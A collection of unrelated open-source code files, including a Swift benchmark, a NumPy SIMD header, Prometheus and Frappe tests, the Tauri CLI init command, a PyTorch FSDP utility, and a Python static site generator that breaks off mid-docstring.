var adjacentPyramids = adjacentPyramidsTemplate
adjacentPyramids.sort()
// Check whether pyramid is sorted.
check(
adjacentPyramids[0] <= adjacentPyramids[adjacentPyramids.count/2])
}
} | swift | github | https://github.com/apple/swift | benchmark/single-source/SortIntPyramids.swift |
import pickle
import datetime
import os.path as path
default_date_format = '%Y/%m/%d'
class DatedFilesReader:
"""To only be used in a with block. This class will read a file up to
the current date and will store progress information into a specified
checkpoint file."""
def __init__(self, checkpoint_filename):
self.checkpoint_filename = checkpoint_filename
def __enter__(self):
"""Only load checkpoint data when used in a with block"""
self.checkpoints = pickle.load(open(self.checkpoint_filename, 'rb')) \
if path.isfile(self.checkpoint_filename) else {}
return self
def __exit__(self, type, value, traceback):
"""Serialize pickled object when exiting the with block"""
pickle.dump(self.checkpoints, open(self.checkpoint_filename, 'wb'))
def read_file(self, filename_template, from_date=datetime.date.today(),
date_fmt=default_date_format, force_date=False):
"""Returns the lines in a file using previous checkpoint data and
reading up until the most recent data"""
if not (hasattr(self, 'checkpoints') or '{date}' in filename_template):
return
elif filename_template in self.checkpoints and not force_date:
date, offset = self.checkpoints[filename_template]
else:
date = from_date
offset = 0
cur_date = date
while cur_date <= datetime.date.today():
with open(filename_template.format(
date=cur_date.strftime(date_fmt))) as f:
if cur_date != date:
date = cur_date
offset = 0
else:
f.seek(offset)
for line in f:
offset += len(line)
yield line.strip()
cur_date += datetime.timedelta(days=1)
self.checkpoints[filename_template] = (date, offset) | unknown | codeparrot/codeparrot-clean | ||
#ifndef NPY_SIMD
#error "Not a standalone header, use simd/simd.h instead"
#endif
#ifndef _NPY_SIMD_AVX512_MASKOP_H
#define _NPY_SIMD_AVX512_MASKOP_H
/**
* Implements conditional addition and subtraction.
* e.g. npyv_ifadd_f32(m, a, b, c) -> m ? a + b : c
* e.g. npyv_ifsub_f32(m, a, b, c) -> m ? a - b : c
*/
#define NPYV_IMPL_AVX512_EMULATE_MASK_ADDSUB(SFX, BSFX) \
NPY_FINLINE npyv_##SFX npyv_ifadd_##SFX \
(npyv_##BSFX m, npyv_##SFX a, npyv_##SFX b, npyv_##SFX c) \
{ \
npyv_##SFX add = npyv_add_##SFX(a, b); \
return npyv_select_##SFX(m, add, c); \
} \
NPY_FINLINE npyv_##SFX npyv_ifsub_##SFX \
(npyv_##BSFX m, npyv_##SFX a, npyv_##SFX b, npyv_##SFX c) \
{ \
npyv_##SFX sub = npyv_sub_##SFX(a, b); \
return npyv_select_##SFX(m, sub, c); \
}
#define NPYV_IMPL_AVX512_MASK_ADDSUB(SFX, BSFX, ZSFX) \
NPY_FINLINE npyv_##SFX npyv_ifadd_##SFX \
(npyv_##BSFX m, npyv_##SFX a, npyv_##SFX b, npyv_##SFX c) \
{ return _mm512_mask_add_##ZSFX(c, m, a, b); } \
NPY_FINLINE npyv_##SFX npyv_ifsub_##SFX \
(npyv_##BSFX m, npyv_##SFX a, npyv_##SFX b, npyv_##SFX c) \
{ return _mm512_mask_sub_##ZSFX(c, m, a, b); }
#ifdef NPY_HAVE_AVX512BW
NPYV_IMPL_AVX512_MASK_ADDSUB(u8, b8, epi8)
NPYV_IMPL_AVX512_MASK_ADDSUB(s8, b8, epi8)
NPYV_IMPL_AVX512_MASK_ADDSUB(u16, b16, epi16)
NPYV_IMPL_AVX512_MASK_ADDSUB(s16, b16, epi16)
#else
NPYV_IMPL_AVX512_EMULATE_MASK_ADDSUB(u8, b8)
NPYV_IMPL_AVX512_EMULATE_MASK_ADDSUB(s8, b8)
NPYV_IMPL_AVX512_EMULATE_MASK_ADDSUB(u16, b16)
NPYV_IMPL_AVX512_EMULATE_MASK_ADDSUB(s16, b16)
#endif
NPYV_IMPL_AVX512_MASK_ADDSUB(u32, b32, epi32)
NPYV_IMPL_AVX512_MASK_ADDSUB(s32, b32, epi32)
NPYV_IMPL_AVX512_MASK_ADDSUB(u64, b64, epi64)
NPYV_IMPL_AVX512_MASK_ADDSUB(s64, b64, epi64)
NPYV_IMPL_AVX512_MASK_ADDSUB(f32, b32, ps)
NPYV_IMPL_AVX512_MASK_ADDSUB(f64, b64, pd)
// division, m ? a / b : c
NPY_FINLINE npyv_f32 npyv_ifdiv_f32(npyv_b32 m, npyv_f32 a, npyv_f32 b, npyv_f32 c)
{ return _mm512_mask_div_ps(c, m, a, b); }
// conditional division, m ? a / b : 0
NPY_FINLINE npyv_f32 npyv_ifdivz_f32(npyv_b32 m, npyv_f32 a, npyv_f32 b)
{ return _mm512_maskz_div_ps(m, a, b); }
// division, m ? a / b : c
NPY_FINLINE npyv_f64 npyv_ifdiv_f64(npyv_b32 m, npyv_f64 a, npyv_f64 b, npyv_f64 c)
{ return _mm512_mask_div_pd(c, m, a, b); }
// conditional division, m ? a / b : 0
NPY_FINLINE npyv_f64 npyv_ifdivz_f64(npyv_b32 m, npyv_f64 a, npyv_f64 b)
{ return _mm512_maskz_div_pd(m, a, b); }
#endif // _NPY_SIMD_AVX512_MASKOP_H | c | github | https://github.com/numpy/numpy | numpy/_core/src/common/simd/avx512/maskop.h |
// Copyright The Prometheus Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package hetzner
import (
"context"
"fmt"
"testing"
"github.com/prometheus/common/model"
"github.com/prometheus/common/promslog"
"github.com/stretchr/testify/require"
)
type hcloudSDTestSuite struct {
Mock *SDMock
}
func (s *hcloudSDTestSuite) SetupTest(t *testing.T) {
s.Mock = NewSDMock(t)
s.Mock.Setup()
s.Mock.HandleHcloudServers()
s.Mock.HandleHcloudNetworks()
}
func TestHCloudSDRefresh(t *testing.T) {
suite := &hcloudSDTestSuite{}
suite.SetupTest(t)
cfg := DefaultSDConfig
cfg.HTTPClientConfig.BearerToken = hcloudTestToken
cfg.hcloudEndpoint = suite.Mock.Endpoint()
d, err := newHcloudDiscovery(&cfg, promslog.NewNopLogger())
require.NoError(t, err)
targetGroups, err := d.refresh(context.Background())
require.NoError(t, err)
require.Len(t, targetGroups, 1)
targetGroup := targetGroups[0]
require.NotNil(t, targetGroup, "targetGroup should not be nil")
require.NotNil(t, targetGroup.Targets, "targetGroup.targets should not be nil")
require.Len(t, targetGroup.Targets, 3)
for i, labelSet := range []model.LabelSet{
{
"__address__": model.LabelValue("1.2.3.4:80"),
"__meta_hetzner_role": model.LabelValue("hcloud"),
"__meta_hetzner_server_id": model.LabelValue("42"),
"__meta_hetzner_server_name": model.LabelValue("my-server"),
"__meta_hetzner_server_status": model.LabelValue("running"),
"__meta_hetzner_public_ipv4": model.LabelValue("1.2.3.4"),
"__meta_hetzner_public_ipv6_network": model.LabelValue("2001:db8::/64"),
"__meta_hetzner_datacenter": model.LabelValue("fsn1-dc8"),
"__meta_hetzner_hcloud_image_name": model.LabelValue("ubuntu-20.04"),
"__meta_hetzner_hcloud_image_description": model.LabelValue("Ubuntu 20.04 Standard 64 bit"),
"__meta_hetzner_hcloud_image_os_flavor": model.LabelValue("ubuntu"),
"__meta_hetzner_hcloud_image_os_version": model.LabelValue("20.04"),
"__meta_hetzner_hcloud_datacenter_location": model.LabelValue("fsn1"),
"__meta_hetzner_hcloud_datacenter_location_network_zone": model.LabelValue("eu-central"),
"__meta_hetzner_hcloud_cpu_cores": model.LabelValue("1"),
"__meta_hetzner_hcloud_cpu_type": model.LabelValue("shared"),
"__meta_hetzner_hcloud_memory_size_gb": model.LabelValue("1"),
"__meta_hetzner_hcloud_disk_size_gb": model.LabelValue("25"),
"__meta_hetzner_hcloud_server_type": model.LabelValue("cx11"),
"__meta_hetzner_hcloud_private_ipv4_mynet": model.LabelValue("10.0.0.2"),
"__meta_hetzner_hcloud_labelpresent_my_key": model.LabelValue("true"),
"__meta_hetzner_hcloud_label_my_key": model.LabelValue("my-value"),
},
{
"__address__": model.LabelValue("1.2.3.5:80"),
"__meta_hetzner_role": model.LabelValue("hcloud"),
"__meta_hetzner_server_id": model.LabelValue("44"),
"__meta_hetzner_server_name": model.LabelValue("another-server"),
"__meta_hetzner_server_status": model.LabelValue("stopped"),
"__meta_hetzner_datacenter": model.LabelValue("fsn1-dc14"),
"__meta_hetzner_public_ipv4": model.LabelValue("1.2.3.5"),
"__meta_hetzner_public_ipv6_network": model.LabelValue("2001:db9::/64"),
"__meta_hetzner_hcloud_image_name": model.LabelValue("ubuntu-20.04"),
"__meta_hetzner_hcloud_image_description": model.LabelValue("Ubuntu 20.04 Standard 64 bit"),
"__meta_hetzner_hcloud_image_os_flavor": model.LabelValue("ubuntu"),
"__meta_hetzner_hcloud_image_os_version": model.LabelValue("20.04"),
"__meta_hetzner_hcloud_datacenter_location": model.LabelValue("fsn1"),
"__meta_hetzner_hcloud_datacenter_location_network_zone": model.LabelValue("eu-central"),
"__meta_hetzner_hcloud_cpu_cores": model.LabelValue("2"),
"__meta_hetzner_hcloud_cpu_type": model.LabelValue("shared"),
"__meta_hetzner_hcloud_memory_size_gb": model.LabelValue("1"),
"__meta_hetzner_hcloud_disk_size_gb": model.LabelValue("50"),
"__meta_hetzner_hcloud_server_type": model.LabelValue("cpx11"),
"__meta_hetzner_hcloud_labelpresent_key": model.LabelValue("true"),
"__meta_hetzner_hcloud_labelpresent_other_key": model.LabelValue("true"),
"__meta_hetzner_hcloud_label_key": model.LabelValue(""),
"__meta_hetzner_hcloud_label_other_key": model.LabelValue("value"),
},
{
"__address__": model.LabelValue("1.2.3.6:80"),
"__meta_hetzner_role": model.LabelValue("hcloud"),
"__meta_hetzner_server_id": model.LabelValue("36"),
"__meta_hetzner_server_name": model.LabelValue("deleted-image-server"),
"__meta_hetzner_server_status": model.LabelValue("stopped"),
"__meta_hetzner_datacenter": model.LabelValue("fsn1-dc14"),
"__meta_hetzner_public_ipv4": model.LabelValue("1.2.3.6"),
"__meta_hetzner_public_ipv6_network": model.LabelValue("2001:db7::/64"),
"__meta_hetzner_hcloud_datacenter_location": model.LabelValue("fsn1"),
"__meta_hetzner_hcloud_datacenter_location_network_zone": model.LabelValue("eu-central"),
"__meta_hetzner_hcloud_cpu_cores": model.LabelValue("2"),
"__meta_hetzner_hcloud_cpu_type": model.LabelValue("shared"),
"__meta_hetzner_hcloud_memory_size_gb": model.LabelValue("1"),
"__meta_hetzner_hcloud_disk_size_gb": model.LabelValue("50"),
"__meta_hetzner_hcloud_server_type": model.LabelValue("cpx11"),
},
} {
t.Run(fmt.Sprintf("item %d", i), func(t *testing.T) {
require.Equal(t, labelSet, targetGroup.Targets[i])
})
}
} | go | github | https://github.com/prometheus/prometheus | discovery/hetzner/hcloud_test.go |
// Copyright 2019-2024 Tauri Programme within The Commons Conservancy
// SPDX-License-Identifier: Apache-2.0
// SPDX-License-Identifier: MIT
use crate::{
helpers::{
framework::{infer_from_package_json as infer_framework, Framework},
npm::PackageManager,
prompts, resolve_tauri_path, template,
},
VersionMetadata,
};
use std::{
collections::BTreeMap,
env::current_dir,
fs::{read_to_string, remove_dir_all},
path::PathBuf,
};
use crate::{
error::{Context, ErrorExt},
Result,
};
use clap::Parser;
use handlebars::{to_json, Handlebars};
use include_dir::{include_dir, Dir};
const TEMPLATE_DIR: Dir<'_> = include_dir!("$CARGO_MANIFEST_DIR/templates/app");
const TAURI_CONF_TEMPLATE: &str = include_str!("../templates/tauri.conf.json");
#[derive(Debug, Parser)]
#[clap(about = "Initialize a Tauri project in an existing directory")]
pub struct Options {
/// Skip prompting for values
#[clap(long, env = "CI")]
ci: bool,
/// Force init to overwrite the src-tauri folder
#[clap(short, long)]
force: bool,
/// Enables logging
#[clap(short, long)]
log: bool,
/// Set target directory for init
#[clap(short, long)]
#[clap(default_value_t = current_dir().expect("failed to read cwd").display().to_string())]
directory: String,
/// Path of the Tauri project to use (relative to the cwd)
#[clap(short, long)]
tauri_path: Option<PathBuf>,
/// Name of your Tauri application
#[clap(short = 'A', long)]
app_name: Option<String>,
/// Window title of your Tauri application
#[clap(short = 'W', long)]
window_title: Option<String>,
/// Web assets location, relative to <project-dir>/src-tauri
#[clap(short = 'D', long)]
frontend_dist: Option<String>,
/// Url of your dev server
#[clap(short = 'P', long)]
dev_url: Option<String>,
/// A shell command to run before `tauri dev` kicks in.
#[clap(long)]
before_dev_command: Option<String>,
/// A shell command to run before `tauri build` kicks in.
#[clap(long)]
before_build_command: Option<String>,
}
#[derive(Default)]
struct InitDefaults {
app_name: Option<String>,
framework: Option<Framework>,
}
impl Options {
fn load(mut self) -> Result<Self> {
let package_json_path = PathBuf::from(&self.directory).join("package.json");
let init_defaults = if package_json_path.exists() {
let package_json_text =
read_to_string(&package_json_path).fs_context("failed to read", &package_json_path)?;
let package_json: crate::PackageJson =
serde_json::from_str(&package_json_text).context("failed to parse JSON")?;
let (framework, _) = infer_framework(&package_json_text);
InitDefaults {
app_name: package_json.product_name.or(package_json.name),
framework,
}
} else {
Default::default()
};
self.app_name = self.app_name.map(|s| Ok(Some(s))).unwrap_or_else(|| {
prompts::input(
"What is your app name?",
Some(
init_defaults
.app_name
.clone()
.unwrap_or_else(|| "Tauri App".to_string()),
),
self.ci,
true,
)
})?;
self.window_title = self.window_title.map(|s| Ok(Some(s))).unwrap_or_else(|| {
prompts::input(
"What should the window title be?",
Some(
init_defaults
.app_name
.clone()
.unwrap_or_else(|| "Tauri".to_string()),
),
self.ci,
true,
)
})?;
self.frontend_dist = self.frontend_dist.map(|s| Ok(Some(s))).unwrap_or_else(|| prompts::input(
r#"Where are your web assets (HTML/CSS/JS) located, relative to the "<current dir>/src-tauri/tauri.conf.json" file that will be created?"#,
init_defaults.framework.as_ref().map(|f| f.frontend_dist()),
self.ci,
false,
))?;
self.dev_url = self.dev_url.map(|s| Ok(Some(s))).unwrap_or_else(|| {
prompts::input(
"What is the url of your dev server?",
init_defaults.framework.map(|f| f.dev_url()),
self.ci,
true,
)
})?;
let detected_package_manager = PackageManager::from_project(&self.directory);
self.before_dev_command = self
.before_dev_command
.map(|s| Ok(Some(s)))
.unwrap_or_else(|| {
prompts::input(
"What is your frontend dev command?",
Some(default_dev_command(detected_package_manager).into()),
self.ci,
true,
)
})?;
self.before_build_command = self
.before_build_command
.map(|s| Ok(Some(s)))
.unwrap_or_else(|| {
prompts::input(
"What is your frontend build command?",
Some(default_build_command(detected_package_manager).into()),
self.ci,
true,
)
})?;
Ok(self)
}
}
fn default_dev_command(pm: PackageManager) -> &'static str {
match pm {
PackageManager::Yarn => "yarn dev",
PackageManager::YarnBerry => "yarn dev",
PackageManager::Npm => "npm run dev",
PackageManager::Pnpm => "pnpm dev",
PackageManager::Bun => "bun dev",
PackageManager::Deno => "deno task dev",
}
}
fn default_build_command(pm: PackageManager) -> &'static str {
match pm {
PackageManager::Yarn => "yarn build",
PackageManager::YarnBerry => "yarn build",
PackageManager::Npm => "npm run build",
PackageManager::Pnpm => "pnpm build",
PackageManager::Bun => "bun build",
PackageManager::Deno => "deno task build",
}
}
pub fn command(mut options: Options) -> Result<()> {
options = options.load()?;
let template_target_path = PathBuf::from(&options.directory).join("src-tauri");
let metadata = serde_json::from_str::<VersionMetadata>(include_str!("../metadata-v2.json"))
.context("failed to parse version metadata")?;
if template_target_path.exists() && !options.force {
log::warn!(
"Tauri dir ({:?}) not empty. Run `init --force` to overwrite.",
template_target_path
);
} else {
let (tauri_dep, tauri_build_dep, tauri_utils_dep, tauri_plugin_dep) =
if let Some(tauri_path) = &options.tauri_path {
(
format!(
r#"{{ path = {:?} }}"#,
resolve_tauri_path(tauri_path, "crates/tauri")
),
format!(
"{{ path = {:?} }}",
resolve_tauri_path(tauri_path, "crates/tauri-build")
),
format!(
"{{ path = {:?} }}",
resolve_tauri_path(tauri_path, "crates/tauri-utils")
),
format!(
"{{ path = {:?} }}",
resolve_tauri_path(tauri_path, "crates/tauri-plugin")
),
)
} else {
(
format!(r#"{{ version = "{}" }}"#, metadata.tauri),
format!(r#"{{ version = "{}" }}"#, metadata.tauri_build),
r#"{{ version = "2" }}"#.to_string(),
r#"{{ version = "2" }}"#.to_string(),
)
};
let _ = remove_dir_all(&template_target_path);
let mut handlebars = Handlebars::new();
handlebars.register_escape_fn(handlebars::no_escape);
let mut data = BTreeMap::new();
data.insert("tauri_dep", to_json(tauri_dep));
if options.tauri_path.is_some() {
data.insert("patch_tauri_dep", to_json(true));
}
data.insert("tauri_build_dep", to_json(tauri_build_dep));
data.insert("tauri_utils_dep", to_json(tauri_utils_dep));
data.insert("tauri_plugin_dep", to_json(tauri_plugin_dep));
data.insert(
"frontend_dist",
to_json(options.frontend_dist.as_deref().unwrap_or("../dist")),
);
data.insert("dev_url", to_json(options.dev_url));
data.insert(
"app_name",
to_json(options.app_name.as_deref().unwrap_or("Tauri App")),
);
data.insert(
"window_title",
to_json(options.window_title.as_deref().unwrap_or("Tauri")),
);
data.insert("before_dev_command", to_json(options.before_dev_command));
data.insert(
"before_build_command",
to_json(options.before_build_command),
);
let mut config = serde_json::from_str(
&handlebars
.render_template(TAURI_CONF_TEMPLATE, &data)
.expect("Failed to render tauri.conf.json template"),
)
.unwrap();
if option_env!("TARGET") == Some("node") {
let mut dir = current_dir().expect("failed to read cwd");
let mut count = 0;
let mut cli_node_module_path = None;
let cli_path = "node_modules/@tauri-apps/cli";
// only go up three folders max
while count <= 2 {
let test_path = dir.join(cli_path);
if test_path.exists() {
let mut node_module_path = PathBuf::from("..");
for _ in 0..count {
node_module_path.push("..");
}
node_module_path.push(cli_path);
node_module_path.push("config.schema.json");
cli_node_module_path.replace(node_module_path);
break;
}
count += 1;
match dir.parent() {
Some(parent) => {
dir = parent.to_path_buf();
}
None => break,
}
}
if let Some(cli_node_module_path) = cli_node_module_path {
let mut map = serde_json::Map::default();
map.insert(
"$schema".into(),
serde_json::Value::String(
cli_node_module_path
.display()
.to_string()
.replace('\\', "/"),
),
);
let merge_config = serde_json::Value::Object(map);
json_patch::merge(&mut config, &merge_config);
}
}
data.insert(
"tauri_config",
to_json(serde_json::to_string_pretty(&config).unwrap()),
);
template::render(&handlebars, &data, &TEMPLATE_DIR, &options.directory)
.with_context(|| "failed to render Tauri template")?;
}
Ok(())
} | rust | github | https://github.com/tauri-apps/tauri | crates/tauri-cli/src/init.rs |
import argparse
import functools
import importlib
import os
import torch
import torch.distributed as dist
import torch.nn as nn
from torch._dynamo.testing import reduce_to_scalar_loss
from torch.distributed.algorithms._checkpoint.checkpoint_wrapper import (
apply_activation_checkpointing,
checkpoint_wrapper,
CheckpointImpl,
)
from torch.distributed.fsdp import FullyShardedDataParallel as FSDP
from torch.distributed.fsdp.wrap import ModuleWrapPolicy
try:
from .torchbench import setup_torchbench_cwd
except ImportError:
from torchbench import setup_torchbench_cwd
def setup(rank, world_size):
os.environ["MASTER_ADDR"] = os.getenv("MASTER_ADDR", "localhost")
os.environ["MASTER_PORT"] = os.getenv("MASTER_PORT", "12355")
os.environ["RANK"] = os.getenv("RANK", "0")
os.environ["WORLD_SIZE"] = os.getenv("WORLD_SIZE", "1")
dist.init_process_group("nccl")
def cleanup():
dist.destroy_process_group()
class CustomLinear(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.weight = nn.Parameter(torch.randn(a, b))
def forward(self, x):
return torch.mm(x, self.weight)
class MyModule(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.net = nn.Sequential(
nn.Linear(a, b),
nn.ReLU(),
)
def forward(self, x):
return self.net(x)
class ToyModel(nn.Module):
def __init__(self):
super().__init__()
self.net = nn.Sequential(
*[nn.Linear(10, 10000), nn.ReLU()]
+ [nn.Linear(10000, 10000), nn.ReLU()]
+ [MyModule(10000, 10000)]
+ [MyModule(10000, 1000)]
+ [MyModule(1000, 1000)]
+ [MyModule(1000, 1000)]
+ [MyModule(1000, 1000)]
+ [MyModule(1000, 1000)]
+ [MyModule(1000, 1000)]
+ [MyModule(1000, 1000)]
+ [MyModule(1000, 1000)]
+ [nn.Linear(1000, 5)]
)
def forward(self, x):
return self.net(x)
def model_iter_fn(model, example_inputs, collect_outputs=False):
outputs = model(*example_inputs)
loss = reduce_to_scalar_loss(outputs)
loss.backward()
if collect_outputs:
return outputs
def get_model(args):
if args.torchbench_model:
setup_torchbench_cwd()
module = importlib.import_module(
f"torchbenchmark.models.{args.torchbench_model}"
)
benchmark_cls = getattr(module, "Model", None)
bm = benchmark_cls(test="train", device=args.device, batch_size=args.batch_size)
model, inputs = bm.get_module()
elif args.toy_model:
model = ToyModel()
inputs = (torch.randn(20, 10),)
else:
raise argparse.ArgumentError(
args.torchbench_model, message="Must specify a model"
)
return model, inputs
def fsdp_checkpointing_base(model, blocks):
"""apply activation checkpointing to model
returns None as model is updated directly
"""
non_reentrant_wrapper = functools.partial(
checkpoint_wrapper,
offload_to_cpu=False,
checkpoint_impl=CheckpointImpl.NO_REENTRANT,
)
def check_fn(submodule):
return isinstance(submodule, blocks)
apply_activation_checkpointing(
model, checkpoint_wrapper_fn=non_reentrant_wrapper, check_fn=check_fn
)
MODEL_FSDP_WRAP = {
"toy_model": (MyModule,),
}
def apply_fsdp(args, model, use_checkpointing=False, use_wrap_policy=True):
wrap_policy = None
blocks = MODEL_FSDP_WRAP[
"toy_model" if model.__class__ is ToyModel else args.torchbench_model
]
if use_wrap_policy:
wrap_policy = ModuleWrapPolicy(blocks)
model = FSDP(model, auto_wrap_policy=wrap_policy, use_orig_params=True)
if use_checkpointing:
fsdp_checkpointing_base(model, blocks)
return model | python | github | https://github.com/pytorch/pytorch | benchmarks/dynamo/dist_util.py |
# -*- coding: utf-8 -*-
# Copyright (c) 2019, Frappe Technologies and Contributors
# See license.txt
import frappe
import unittest
from frappe.utils import get_datetime
from frappe.core.doctype.scheduled_job_type.scheduled_job_type import sync_jobs
class TestScheduledJobType(unittest.TestCase):
def setUp(self):
frappe.db.rollback()
frappe.db.sql('truncate `tabScheduled Job Type`')
sync_jobs()
frappe.db.commit()
def test_sync_jobs(self):
all_job = frappe.get_doc('Scheduled Job Type',
dict(method='frappe.email.queue.flush'))
self.assertEqual(all_job.frequency, 'All')
daily_job = frappe.get_doc('Scheduled Job Type',
dict(method='frappe.email.queue.set_expiry_for_email_queue'))
self.assertEqual(daily_job.frequency, 'Daily')
# check if cron jobs are synced
cron_job = frappe.get_doc('Scheduled Job Type',
dict(method='frappe.oauth.delete_oauth2_data'))
self.assertEqual(cron_job.frequency, 'Cron')
self.assertEqual(cron_job.cron_format, '0/15 * * * *')
# check if jobs are synced after change in hooks
updated_scheduler_events = { "hourly": ["frappe.email.queue.flush"] }
sync_jobs(updated_scheduler_events)
updated_scheduled_job = frappe.get_doc("Scheduled Job Type", {"method": "frappe.email.queue.flush"})
self.assertEqual(updated_scheduled_job.frequency, "Hourly")
def test_daily_job(self):
job = frappe.get_doc('Scheduled Job Type', dict(method = 'frappe.email.queue.set_expiry_for_email_queue'))
job.db_set('last_execution', '2019-01-01 00:00:00')
self.assertTrue(job.is_event_due(get_datetime('2019-01-02 00:00:06')))
self.assertFalse(job.is_event_due(get_datetime('2019-01-01 00:00:06')))
self.assertFalse(job.is_event_due(get_datetime('2019-01-01 23:59:59')))
def test_weekly_job(self):
job = frappe.get_doc('Scheduled Job Type', dict(method = 'frappe.social.doctype.energy_point_log.energy_point_log.send_weekly_summary'))
job.db_set('last_execution', '2019-01-01 00:00:00')
self.assertTrue(job.is_event_due(get_datetime('2019-01-06 00:00:01')))
self.assertFalse(job.is_event_due(get_datetime('2019-01-02 00:00:06')))
self.assertFalse(job.is_event_due(get_datetime('2019-01-05 23:59:59')))
def test_monthly_job(self):
job = frappe.get_doc('Scheduled Job Type', dict(method = 'frappe.email.doctype.auto_email_report.auto_email_report.send_monthly'))
job.db_set('last_execution', '2019-01-01 00:00:00')
self.assertTrue(job.is_event_due(get_datetime('2019-02-01 00:00:01')))
self.assertFalse(job.is_event_due(get_datetime('2019-01-15 00:00:06')))
self.assertFalse(job.is_event_due(get_datetime('2019-01-31 23:59:59')))
def test_cron_job(self):
# runs every 15 mins
job = frappe.get_doc('Scheduled Job Type', dict(method = 'frappe.oauth.delete_oauth2_data'))
job.db_set('last_execution', '2019-01-01 00:00:00')
self.assertTrue(job.is_event_due(get_datetime('2019-01-01 00:15:01')))
self.assertFalse(job.is_event_due(get_datetime('2019-01-01 00:05:06')))
self.assertFalse(job.is_event_due(get_datetime('2019-01-01 00:14:59'))) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/python2
import os
import sys
import shutil
from datetime import datetime
import time
from optparse import OptionParser, OptionGroup
import logging
import fnmatch
import yaml
import wok
from wok.page import Page, Author
from wok import renderers
from wok import util
from wok.dev_server import dev_server
import locale
class Engine(object):
"""
The main engine of wok. Upon initialization, it generates a site from the
source files.
"""
default_options = {
'content_dir': 'content',
'template_dir': 'templates',
'output_dir': 'output',
'working_dir': 'output.work',
'create_backup' : False,
'media_dir': 'media',
'site_title': 'Some random Wok site',
'url_pattern': '/{category}/{slug}{page}.{ext}',
'url_include_index': True,
'slug_from_filename': False,
'relative_urls': False,
'locale': None,
'markdown_extra_plugins': [],
'exclude_files': [],
'rst_doctitle': False,
'rst_initial_header_level': 1,
'rst_strip_comments' : True,
'rst_toc_backlinks' : 'entry',
}
SITE_ROOT = os.getcwd()
def __init__(self, output_lvl=1):
"""
Set up CLI options, logging levels, and start everything off.
Afterwards, run a dev server if asked to.
"""
# CLI options
# -----------
parser = OptionParser(version='%prog v{0}'.format(wok.version))
# Add option to to run the development server after generating pages
devserver_grp = OptionGroup(parser, "Development server",
"Runs a small development server after site generation. "
"--address and --port will be ignored if --server is absent.")
devserver_grp.add_option('--server', action='store_true',
dest='runserver',
help="run a development server after generating the site")
devserver_grp.add_option('--address', action='store', dest='address',
help="specify ADDRESS on which to run development server")
devserver_grp.add_option('--port', action='store', dest='port',
type='int',
help="specify PORT on which to run development server")
parser.add_option_group(devserver_grp)
# Options for noisiness level and logging
logging_grp = OptionGroup(parser, "Logging",
"By default, log messages will be sent to standard out, "
"and report only errors and warnings.")
parser.set_defaults(loglevel=logging.WARNING)
logging_grp.add_option('-q', '--quiet', action='store_const',
const=logging.ERROR, dest='loglevel',
help="be completely quiet, log nothing")
logging_grp.add_option('--warnings', action='store_const',
const=logging.WARNING, dest='loglevel',
help="log warnings in addition to errors")
logging_grp.add_option('-v', '--verbose', action='store_const',
const=logging.INFO, dest='loglevel',
help="log ALL the things!")
logging_grp.add_option('--debug', action='store_const',
const=logging.DEBUG, dest='loglevel',
help="log debugging info in addition to warnings and errors")
logging_grp.add_option('--log', '-l', dest='logfile',
help="log to the specified LOGFILE instead of standard out")
parser.add_option_group(logging_grp)
cli_options, args = parser.parse_args()
# Set up logging
# --------------
logging_options = {
'format': '%(levelname)s: %(message)s',
'level': cli_options.loglevel,
}
if cli_options.logfile:
logging_options['filename'] = cli_options.logfile
else:
logging_options['stream'] = sys.stdout
logging.basicConfig(**logging_options)
self.runserver = cli_options.runserver
serverrun_flag = ".server_running"
if os.path.exists(serverrun_flag):
print ""
print "Attention: 'wok --server' seems to be running with this directory as source."
print " Starting another run or instance isn't a good idea..."
print ""
print " You might want to stop the server (via Ctrl-C in it's window)."
print ""
print " If you are sure that there isn't a server instance running,"
print " you should delete file '%s'." % serverrun_flag
print ""
sys.exit(1)
# Action!
# -------
self.generate_site()
# Dev server
# ----------
#todo: Bug: on error (e.g. YAML error) no longer the output_dir is served,
# but the current dir?!?!?!
if cli_options.runserver:
''' Run the dev server if the user said to, and watch the specified
directories for changes. The server will regenerate the entire wok
site if changes are found after every request.
'''
output_dir = self.options['working_dir']
host = '' if cli_options.address is None else cli_options.address
port = 8000 if cli_options.port is None else cli_options.port
server = dev_server(serv_dir=output_dir, host=host, port=port,
dir_mon=True,
watch_dirs=[
self.options['media_dir'],
self.options['template_dir'],
self.options['content_dir']
],
change_handler=self.generate_site)
with open(serverrun_flag, "w") as f:
f.write("")
server.run()
# server.run() leaves in output_dir!?
os.chdir(self.SITE_ROOT)
try:
self.vss_remove(serverrun_flag)
except WindowsError as e:
pass
self.handle_output_dir()
sys.exit(self.error_count)
def generate_site(self):
''' Generate the wok site '''
self.error_count = 0
orig_dir = os.getcwd()
os.chdir(self.SITE_ROOT)
self.all_pages = []
self.read_options()
self.sanity_check()
self.load_hooks()
self.renderer_options()
self.run_hook('site.start')
self.prepare_output()
self.error_count += self.load_pages()
self.make_tree()
self.error_count += self.render_site()
self.run_hook('site.done')
os.chdir(orig_dir)
def vss_rename(self, src, dest):
""" virus scanner safe os.rename
This problem only applies to Windows!
Some virus scanners (e.g. Avira Antivir) are (badly) locking files during scan
and therefore prevent a rename of them or the containing directory.
A Windows error [5] Access denied is raised then.
One possible workaround is to exclude the problematic directories (here: wok output) from virus scan.
But a better one might be the one below.
It tries several times with a little wait inbetween to rename.
If it doesn't succedd within a few seconds finally an error is raised.
Usually one wait (1/10 second) is enough.
References:
The one with the solution for me:
http://bytes.com/topic/python/answers/516413-intermittent-permission-denied-errors-when-using-os-rename-recently-deleted-path
More interesting finding on the way:
http://stackoverflow.com/questions/3764072/c-win32-how-to-wait-for-a-pending-delete-to-complete
http://bugs.python.org/issue1425127 os.remove OSError: [Errno 13] Permission denied
https://groups.google.com/forum/#!topic/comp.lang.python/8uDyIZQVzJ8
http://mercurial.selenic.com/wiki/UnlinkingFilesOnWindows
http://mercurial.markmail.org/thread/t5ecar6sn3ekifo6 How Mercurial could be made working with Virus Scanners on Windows
https://msdn.microsoft.com/en-us/library/aa363858%28VS.85%29.aspx
http://bz.selenic.com/show_bug.cgi?id=2524 update loses working copy files on Windows for open files
"""
